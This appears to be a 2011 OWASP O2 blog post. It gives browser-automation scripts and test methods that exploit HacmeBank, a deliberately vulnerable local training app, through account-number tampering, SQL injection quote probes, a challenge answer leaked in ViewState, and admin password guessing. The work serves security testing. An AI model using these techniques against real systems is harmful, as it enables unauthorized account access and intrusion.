OWASP O2 Platform Blog

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and proofs of concept (PoCs) for HacmeBank's vulnerabilities, with the aim of later turning them into unit tests. HacmeBank is an intentionally vulnerable application: run these scripts only against your own local installation.

This code uses O2's WatiN integration, which provides an easy 'IE automation' scripting environment.

Install and confirm that we can log in

After installing HacmeBank, run the following script, which confirms that the login works. The port number (58348) is whatever your local development web server assigned, so adjust it to match your installation:

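// Open an IE window (the four arguments presumably set position and size —
// confirm against the O2 WatiN extension) and log in to the local HacmeBank
// instance. The start page was "about:black" in the original, which is not a
// valid about: page; "about:blank" is the intended one.
var ie = "about:blank".ie(0,500,750,500);

// The port is whatever the local dev web server assigned — adjust to match your install.
ie.open("http://localhost:58348/HacmeBank_v2_Website");
// Hard-coded credentials: these are sample accounts of a deliberately vulnerable
// test application, not secrets worth protecting.
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
// No assertion yet: success is observed in the browser window. A unit-test
// version should check for an element that only exists after login.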

Vulnerability: User A is able to see User B's account details (an insecure direct object reference — the account number in the URL is simply changed to another account's)

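// Log in as jm, navigate to the transactions page (whose URL carries the
// account number) and request the same page for a different account number.
// If the other account's transactions are displayed, the page does not verify
// that the requested account belongs to the logged-in user (an insecure direct
// object reference).
// The start page was "about:black" in the original, which is not a valid
// about: page; "about:blank" is the intended one.
var ie = "about:blank".ie(0,500,750,500);

// The port is whatever the local dev web server assigned — adjust to match your install.
ie.open("http://localhost:58348/HacmeBank_v2_Website");

// Sample account of the deliberately vulnerable test application.
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();

ie.link("My Accounts").click();
ie.link("View Transactions").click();

// Swap the account number that appears in the URL for a neighbouring one.
// The string replacement is a silent no-op if the URL does not contain this
// exact number (another HacmeBank build or a different account), so a
// unit-test version should first assert that payload differs from url, and
// then assert on the content of the response (e.g. the other account's number
// appearing in the transactions table).
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);

// Keep the window open for a while so the result can be inspected, then close it.
ie.closeInNSeconds(20);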

Vulnerability: SQL Injection in Login page

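// Marked [Test] like the sibling tests so the test runner picks it up
// (the attribute was missing on this method only).
[Test]
public void vulnerability_Sql_Injection_in_Login_page()
{
    setup();
    Browser.open(StartUrl);
    // An unbalanced single quote in the user name: if the login query is
    // built by string concatenation, submitting this produces a database
    // error instead of a normal login failure. There is no assertion yet —
    // the outcome is observed in the browser; a unit-test version should
    // check the response for the error text.
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}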

Vulnerability: SQL Injection in Accounts Details page

[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    // Authenticate as jv and reach the transactions page, whose URL
    // carries the account number used to look up the details.
    setup();
    Browser.open(StartUrl);
    var userField = Browser.field("txtUserName");
    userField.value("jv").flash();
    var passwordField = Browser.field("txtPassword");
    passwordField.value("jv789").flash();
    var submitButton = Browser.button("Submit");
    submitButton.flash().click();
    var accountsLink = Browser.link("My Accounts");
    accountsLink.flash().click();
    var transactionsLink = Browser.link("View Transactions");
    transactionsLink.flash().click();

    // Append an unbalanced quote to the current URL. If the value from the
    // URL is concatenated into the SQL query, the server answers with a
    // database error rather than the transactions page. No assertion is
    // made here — the result is inspected in the browser.
    var injectedUrl = Browser.url() + "' AAAAA ";
    Browser.open(injectedUrl);
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    // Log in with a regular account and open the Admin Section, which asks
    // for a challenge response before granting admin access.
    setup();
    Browser.open(StartUrl);
    var userField = Browser.field("txtUserName");
    userField.value("jv").flash();
    var passwordField = Browser.field("txtPassword");
    passwordField.value("jv789").flash();
    Browser.button("Submit").click();
    var adminLink = Browser.link("Admin Section");
    adminLink.flash().click();

    // The expected response is present in the page's own ViewState, i.e. it
    // is sent to the client (encoded, but evidently not encrypted, or this
    // lookup would not work). Index 12 is a fixed position in the decoded
    // values and will break if the page's control tree changes.
    var viewState = Browser.viewState();
    var response = viewState.ViewState_Values[12];

    // Submit the leaked value as the answer to the challenge.
    var responseField = Browser.field("_ctl3:txtResponse");
    responseField.value(response).flash();
    var loginButton = Browser.button("Login");
    loginButton.flash().click();
}

Script: Fuzzing the Admin password

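// Try a list of candidate passwords against the Admin Section's challenge
// response. Prerequisites: a running HacmeBank instance at startPage (note
// the port differs from the 58348 used in the other scripts — it is whatever
// the local dev server assigned) and a regular account (jv/jv789) with which
// to reach the Admin Section.
panel.clear();
var topPanel = panel.add_Panel();

var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";

// Candidate passwords. The original hard-coded "admin0".."admin9" inside the
// loop; they are built into an array here so the list can be swapped for a
// real wordlist without touching the attempt logic.
var attempts = 10;
var candidates = new string[attempts];
for (int i = 0; i < attempts; i++)
    candidates[i] = "admin" + i;

Action<string> adminLogin =
    (password) => {
        // Every attempt starts from a fresh login so each one sees the same state.
        ie.open(startPage);
        ie.disableFlashing();
        ie.field("txtUserName").value("jv").flash();
        ie.field("txtPassword").value("jv789").flash();
        ie.button("Submit").click();
        ie.link("Admin Section").flash().click();
        // The correct response can also be read directly from the page's
        // ViewState (see the Sensitive Information Disclosure test):
        //   var secret = ie.viewState().ViewState_Values[12];
        ie.field("_ctl3:txtResponse", password);
        ie.button("Login").click();
        // TODO: detect a successful admin login (e.g. look for an admin-only
        // element on the resulting page) and stop iterating; currently every
        // candidate is tried and the outcome must be read off the browser panel.
    };

foreach (var candidate in candidates)
    adminLogin(candidate);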
 
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 — Posted in: HacmeBank, IE Automation, WatiN